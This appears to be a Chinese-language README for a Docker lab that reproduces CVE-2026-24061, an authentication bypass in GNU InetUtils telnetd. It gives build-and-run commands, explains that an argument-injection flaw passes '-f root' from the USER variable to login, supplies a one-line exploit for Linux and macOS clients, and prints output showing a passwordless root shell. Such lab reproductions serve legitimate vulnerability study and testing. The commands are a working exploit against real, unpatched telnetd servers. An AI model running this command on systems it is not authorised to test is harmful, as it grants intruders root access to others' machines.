2026年1月,来自 GNU InetUtils 的 GNU telnetd 服务被 Kyu Neushwaistein(又名 Carlos Cortes Alvarez) 发现存在认证绕过漏洞。该漏洞被追踪为 CVE-2026-24061,允许攻击者在无需提供有效凭据的情况下建立 Telnet 会话,从而获得对目标系统的未授权访问。该漏洞存在于 GNU telnetd 服务直至 2.7-2 版本的所有版本中,看起来就像是直接从 90 年代搬出来的。
这是一个参数注入漏洞(CWE-88),CVSS v3.1 评分为 9.8(严重)。
参考链接:
构建并运行:
docker build -t telnetd-cve-2026-24061 .
docker run --rm -it -p 23:23 telnetd-cve-2026-24061
服务启动后,telnetd 将监听 23 端口。
该漏洞允许通过向 USER 环境变量注入 -f 标志来绕过认证。当 telnetd 接收到以 -f 开头的用户名时,会将其传递给 login 程序,而 login 程序会将 -f 解释为跳过认证的标志。
使用以下命令利用此漏洞并获得 root 访问权限:
# Linux 客户端(需要 -a 选项)
USER="-f root" telnet -a 127.0.0.1 23
# macOS 客户端(无需 -a 选项)
USER="-f root" telnet 127.0.0.1 23
成功利用后,您将无需提供密码即可获得 root shell 访问权限。
$ USER='-f root' telnet -a localhost 23
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
Linux 6.14.0-37-generic (4dbc1b976c10) (pts/1)
Linux 4dbc1b976c10 6.14.0-37-generic #37~24.04.1-Ubuntu SMP PREEMPT_DYNAMIC Thu Nov 20 10:25:38 UTC 2 x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
root@4dbc1b976c10:~# id
uid=0(root) gid=0(root) groups=0(root)